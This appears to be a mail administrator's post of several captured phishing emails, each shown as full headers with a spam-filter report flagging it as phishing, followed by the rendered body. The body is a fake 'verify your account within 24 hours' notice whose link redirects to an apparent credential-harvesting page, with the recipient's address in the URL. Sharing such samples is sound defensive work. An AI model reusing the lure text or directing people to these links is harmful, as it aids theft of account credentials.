Credential phishing Part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9n-00000000N3D-1MBj

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:15 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:15 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:59314)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe1e-00000000LOr-0eVi

for www@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:23:57 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 6B1B5A3B6E

for ; Mon, 8 Dec 2025 16:21:01 +0000 (UTC)

From: doctor.nl2k.ab.ca

To: www@doctor.nl2k.ab.ca

Subject: Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:21:01 -0800

Message-ID: <20251208082100.66FF41985636D0F5@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: doctor.nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.



Content analysis details: (19.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.9 URI_PHISH Phishing using web form

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

Subject: {SPAM?} Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

Credential phishing Part 2


nl2k.ab.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

Verify Your Account (link target: https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#root@nl2k.ab.ca)

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

nl2k.ab.ca Security Team

Security | Privacy | Help (each linked to https://www.html.am/html-editors/online-html-editor.cfm#)

© 2025 nl2k.ab.ca Corporation. All rights reserved.

Credential phishing Part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9f-00000000N2e-0URt

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:07 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:07 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:58070)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe13-00000000LLq-0dFY

for root@nk.ca;

Mon, 08 Dec 2025 09:23:23 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 52407A250A

for ; Mon, 8 Dec 2025 16:21:00 +0000 (UTC)

From: nk.ca

To: root@nk.ca

Subject: Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:59 -0800

Message-ID: <20251208082059.DC8746303D0890C6@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: nk.ca Account Services Account Verification Required We are

conducting a routine security check on all accounts to ensure your account

information is accurate and secure. This process is mandatory to maintain

uninterrupted access to your account.



Content analysis details: (19.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nk.ca Account to Avoid Access Restrictions



X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9j-00000000N2z-0w2Y

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:11 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:11 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:58068)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0y-00000000LLr-0QDA

for root@nl2k.ab.ca;

Mon, 08 Dec 2025 09:23:17 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 9045EA24C3

for ; Mon, 8 Dec 2025 16:20:59 +0000 (UTC)

From: nl2k.ab.ca

To: root@nl2k.ab.ca

Subject: Action Required: Verify Your nl2k.ab.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:59 -0800

Message-ID: <20251208082058.20298A2390BAD0A4@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 19.9

X-Spam_score_int: 199

X-Spam_bar: +++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.



Content analysis details: (19.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.0 ACCT_PHISHING Possible phishing for account information

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nl2k.ab.ca Account to Avoid Access Restrictions


Credential phishing Part 2


nk.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

Verify Your Account (link target: https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#root@nk.ca)

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

nk.ca Security Team

Security | Privacy | Help (each linked to https://www.html.am/html-editors/online-html-editor.cfm#)

© 2025 nk.ca Corporation. All rights reserved.


Credential phishing Part 2


nk.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

Verify Your Account (link target: https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#sales@nk.ca)

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

nk.ca Security Team

Security | Privacy | Help (each linked to https://www.html.am/html-editors/online-html-editor.cfm#)

© 2025 nk.ca Corporation. All rights reserved.


Credential phishing Part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:33:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9a-00000000N2I-3f3o

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:32:02 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:32:02 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:49278)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0t-00000000LLa-1jfh

for sales@nk.ca;

Mon, 08 Dec 2025 09:23:12 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 71865A648A

for ; Mon, 8 Dec 2025 16:20:47 +0000 (UTC)

From: nk.ca

To: sales@nk.ca

Subject: Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:47 -0800

Message-ID: <20251208082046.15A3401F7F4A7C83@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 16.1

X-Spam_score_int: 161

X-Spam_bar: ++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: nk.ca Account Services Account Verification Required We are

conducting a routine security check on all accounts to ensure your account

information is accurate and secure. This process is mandatory to maintain

uninterrupted access to your account.



Content analysis details: (16.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The

query to Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-trusted.bondedsender.org]

-3.0 RCVD_IN_RP_CERTIFIED RBL: Sender in ReturnPath Certified - Contact

cert-sa@returnpath.net

[Excessive Number of Queries | ]

0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-accredit.habeas.com]

-2.0 RCVD_IN_RP_SAFE RBL: Sender in ReturnPath Safe - Contact

safe-sa@returnpath.net

[Excessive Number of Queries | ]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,

https://senderscore.org/blacklistlookup/

[50.76.93.152 listed in bl.score.senderscore.com]

0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in bl.score.senderscore.com]

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Credential phishing Part 2




nk.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

Verify Your Account [href=https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=http://srv244547.hoster-test.ru/Indx/server/IndexIPFSOTFF.html#doctor@nk.ca]

If you do not verify your account within 24 hours, access to your account may be restricted for your protection.

Thank you,

nk.ca Security Team

Security | Privacy | Help [each href=https://www.html.am/html-editors/online-html-editor.cfm#]

© 2025 nk.ca Corporation. All rights reserved.


Credential phishing Part 1

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 09:32:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe9W-00000000N1D-08an

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 09:31:58 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 09:31:57 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from agriel.us ([50.76.93.152]:49270)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSe0t-00000000LLY-1jpq

for doctor@nk.ca;

Mon, 08 Dec 2025 09:23:16 -0700

Received: from gmail.com (unknown [10.240.90.20])

by agriel.us (Postfix) with ESMTPS id 226F7A2195

for ; Mon, 8 Dec 2025 16:20:46 +0000 (UTC)

From: nk.ca

To: doctor@nk.ca

Subject: Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Date: 08 Dec 2025 08:20:46 -0800

Message-ID: <20251208082046.1631302B31DB9B26@gmail.com>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 16.1

X-Spam_score_int: 161

X-Spam_bar: ++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: nk.ca Account Services Account Verification Required We are

conducting a routine security check on all accounts to ensure your account

information is accurate and secure. This process is mandatory to maintain

uninterrupted access to your account.



Content analysis details: (16.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The

query to Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-trusted.bondedsender.org]

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

-3.0 RCVD_IN_RP_CERTIFIED RBL: Sender in ReturnPath Certified - Contact

cert-sa@returnpath.net

[Excessive Number of Queries | ]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-2.0 RCVD_IN_RP_SAFE RBL: Sender in ReturnPath Safe - Contact

safe-sa@returnpath.net

[Excessive Number of Queries | ]

0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in sa-accredit.habeas.com]

1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,

https://senderscore.org/blacklistlookup/

[50.76.93.152 listed in bl.score.senderscore.com]

0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to

Validity was blocked. See

https://knowledge.validity.com/hc/en-us/articles/20961730681243

for more information.

[50.76.93.152 listed in bl.score.senderscore.com]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.0 ACCT_PHISHING Possible phishing for account information

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your nk.ca Account to Avoid Access Restrictions

Credential phishing Part 2







 




doctor.nl2k.ab.ca Account Services

Account Verification Required

We are conducting a routine security check on all accounts to ensure your account information is accurate and secure. This process is mandatory to maintain uninterrupted access to your account.

Recommended action:

Please verify your account within the next 24 hours to avoid any temporary access restrictions.

